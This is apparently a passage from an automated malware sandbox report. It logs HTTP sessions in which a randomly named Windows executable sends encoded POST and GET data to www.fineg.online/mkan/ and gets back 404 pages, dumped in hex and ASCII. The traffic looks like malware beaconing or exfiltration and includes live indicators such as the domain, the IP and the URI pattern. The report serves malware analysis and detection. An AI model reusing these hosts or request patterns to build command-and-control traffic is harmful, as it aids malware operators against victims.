                              Data Raw: 4b 78 64 4c 67 4e 69 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 53 77 76 47 61 6f 49 2f 72 39 7a 48 43 57 4c 66 41 4a 32 75 64 78 45 6a 6f 46 64 34 68 64 65 61 65 44 35 74 4b 32 2f 68 42 35 69 67 42 7a 68 36 73 6b 67 30 4d 64 59 71 35 55 47 36 2b 74 6b 70 58 61 76 54 6f 6a 45 43 54 72 38 6d 33 71 66 6f 7a 50 79 59 65 4c 65 6b 57 65 4d 70 42 70 6a 4a 71 2f 53 42 38 49 58 64 39 6e 56 70 6c 77 31 54 48 70 63 49 34 46 4a 35 58 71 35 5a 48 2f 50 64 43 35 76 78 64 59 57 55 32 6b 49 58 4f 38 52 2b 74 4f 32 64 6a 74 59 41 4c 2f 51 37 36 45 6e 6d 36 70 53 66 71 49 76 2b 75 69 42 6f 32 42 47 58 49 71
                              Data Ascii: KxdLgNi=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaSwvGaoI/r9zHCWLfAJ2udxEjoFd4hdeaeD5tK2/hB5igBzh6skg0MdYq5UG6+tkpXavTojECTr8m3qfozPyYeLekWeMpBpjJq/SB8IXd9nVplw1THpcI4FJ5Xq5ZH/PdC5vxdYWU2kIXO8R+tO2djtYAL/Q76Enm6pSfqIv+uiBo2BGXIq
                              Aug 30, 2024 09:18:17.878793955 CEST1236INHTTP/1.1 404 Not Found
                              Date: Fri, 30 Aug 2024 07:18:17 GMT
                              Server: Apache
                              Content-Length: 18121
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                              Aug 30, 2024 09:18:17.878818035 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                              Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                              Aug 30, 2024 09:18:17.878827095 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                              Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                              Aug 30, 2024 09:18:17.878839970 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                              Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                              Aug 30, 2024 09:18:17.878851891 CEST896INData Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                              Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                              Aug 30, 2024 09:18:17.879388094 CEST1236INData Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                              Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
                              Aug 30, 2024 09:18:17.879400015 CEST224INData Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                              Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/>
                              Aug 30, 2024 09:18:17.879416943 CEST1236INData Raw: 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22
                              Data Ascii: <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/>
                              Aug 30, 2024 09:18:17.879429102 CEST1236INData Raw: 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e
                              Data Ascii: 2.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-150.2 282.4
                              Aug 30, 2024 09:18:17.879439116 CEST1236INData Raw: 34 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a
                              Data Ascii: 490 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M480 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M470 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M460 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M450 282.4h-3l-6
                              Aug 30, 2024 09:18:17.883825064 CEST1236INData Raw: 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 36 30 20 32 38 32
                              Data Ascii: h class="st2" d="M270 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M260 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M250 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M240 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.549729162.0.239.141805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:19.943846941 CEST1758OUTPOST /mkan/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.fineg.online
                              Origin: http://www.fineg.online
                              Referer: http://www.fineg.online/mkan/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 71 77 76 31 53 6f 4a 65 72 39 79 48 43 57 58 76 41 4d 32 75 64 6f 45 6a 77 42 64 34 73 69 65 59 6d 44 34 50 53 32 33 31 64 35 6f 67 42 7a 75 61 73 6c 39 6b 4d 79 59 72 49 64 47 36 75 74 6b 70 58 61 76 56 55 6a 47 58 76 72 2b 6d 33 72 59 6f 7a 54 35 34 65 6a 65 6b 2f 68 4d 70 55 4c 6a 34 4b 2f 54 6c 51 49 51 6f 52 6e 55 4a 6c 79 79 54 48 78 63 49 30 6b 4a 35 62 41 35 5a 7a 42 50 66 69 35 72 6d 59 73 4d 56 2b 76 54 32 44 45 63 65 6b 69 6a 36 58 49 62 68 4c 7a 59 72 4f 32 76 43 69 39 48 49 62 4f 73 4b 7a 32 58 75 69 74 55 67 64 45 43 6e 52 48 38 36 39 73 36 59 66 4d 73 43 56 35 46 37 5a 79 46 7a 41 4d 45 4a 5a 35 49 6f 37 5a 72 2f 6b 43 4f 56 6d 6d 61 71 4b 78 36 68 2b 4e 50 50 57 4a 62 35 69 41 43 66 70 39 30 6c 78 31 6a 48 37 38 38 38 36 5a 74 46 4f 61 6c 36 45 74 34 6b 31 37 68 6f 52 47 35 2b 39 68 5a 4e 43 5a 71 79 46 61 54 7a 54 77 2f 69 42 55 6a 32 [TRUNCATED]
                              Data Ascii: KxdLgNi=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaqwv1SoJer9yHCWXvAM2udoEjwBd4sieYmD4PS231d5ogBzuasl9kMyYrIdG6utkpXavVUjGXvr+m3rYozT54ejek/hMpULj4K/TlQIQoRnUJlyyTHxcI0kJ5bA5ZzBPfi5rmYsMV+vT2DEcekij6XIbhLzYrO2vCi9HIbOsKz2XuitUgdECnRH869s6YfMsCV5F7ZyFzAMEJZ5Io7Zr/kCOVmmaqKx6h+NPPWJb5iACfp90lx1jH78886ZtFOal6Et4k17hoRG5+9hZNCZqyFaTzTw/iBUj2qydcoRZk/dRnUOtLmE6M/2o/QTjzxV9JOncu0/+r0/NM+wN1WWRQwpOu0rPBg3EqTPgjr+Wb5J33S0wsPsntLkt/zTZHkSE/Yfk98M7OE3eKnEMAVRHcWPLWEdb1BHESJVevv4gCTDNFT2NLqopU6DGn22oAPLGw+4y96oVMuwMxLE+lppOxZSUnEVsX8ecCKgKJDkTlJZEVIPQTLTdII4N5mx+zlGBM1ReuloqB4L6sk2v9QV36k3/hFqAc0LZPY6GJa+4AByERVTF42WsOqc+3keuCUmrVI6YEv7HcKa8APhcKGpnVEPk8dlywYEmXujrlpGq+zKVx/5FR/DM5ND2P7gukOB3JBoG41AIg0bCez2JYVecvdY3vDv5Kggdt+CLB6jMhT8Oq68SpU0utf+fnBpjGSpmsFiRyqTceVXJajEkOKSrl7XAuycIGfToWScLrQloJoWbfwSCgW5wRHH++Z960ZKvxJny7KSjZM+syYvPOhNI+gYJ8JSuGT/KtDCuqrwONZZ36pINAHZ+DAFPIyXJUUOl2NafyvxjeYWlwctNpzQAcCkefLICyIDI5KmX8gJh1les0UB1tOgrI9UN8SQ4d7CSzb+wOoCyUGbDdiaDH1MJTRKmWChq4xgNYpjffUkoBLG4acAe1m04f1mgRZZXdZET4lr [TRUNCATED]
                              Aug 30, 2024 09:18:20.514219046 CEST1236INHTTP/1.1 404 Not Found
                              Date: Fri, 30 Aug 2024 07:18:20 GMT
                              Server: Apache
                              Content-Length: 18121
                              Connection: close
                              Content-Type: text/html
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                              Aug 30, 2024 09:18:20.514249086 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                              Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                              Aug 30, 2024 09:18:20.514261007 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                              Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                              Aug 30, 2024 09:18:20.514275074 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                              Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                              Aug 30, 2024 09:18:20.514286995 CEST896INData Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                              Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                              Aug 30, 2024 09:18:20.514297962 CEST1236INData Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                              Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
                              Aug 30, 2024 09:18:20.514311075 CEST1236INData Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                              Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/> <path class="s
                              Aug 30, 2024 09:18:20.514322042 CEST1236INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                              Data Ascii: h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-200.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-190.2 282.4h-3l-6.8 25.2h3z
                              Aug 30, 2024 09:18:20.514333963 CEST1236INData Raw: 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                              Data Ascii: 2.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M500 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M490 282.4h-3l-6.8 2
                              Aug 30, 2024 09:18:20.514345884 CEST1236INData Raw: 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 30 30 20 32 38 32 2e 34 68 2d
                              Data Ascii: ass="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M290 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M280 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M2
                              Aug 30, 2024 09:18:20.519443989 CEST1236INData Raw: 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32
                              Data Ascii: "/> <path class="st2" d="M90 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M80 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M70 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M60 282.4h-3l-6.8 25.2h3z"/> </g> <p


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.549730162.0.239.141805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:18:22.489532948 CEST458OUTGET /mkan/?lL2=1ZRtX&KxdLgNi=++BThBYRK05wjkBDkCMyqRU9EXa7XpQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQlnoxyYMQ/CoARoRTEZylvaiatUE6PHz4hBbvUaTHyaHkPw== HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.fineg.online
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:18:23.105999947 CEST1236INHTTP/1.1 404 Not Found
                              Date: Fri, 30 Aug 2024 07:18:22 GMT
                              Server: Apache
                              Content-Length: 18121
                              Connection: close
                              Content-Type: text/html; charset=utf-8
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
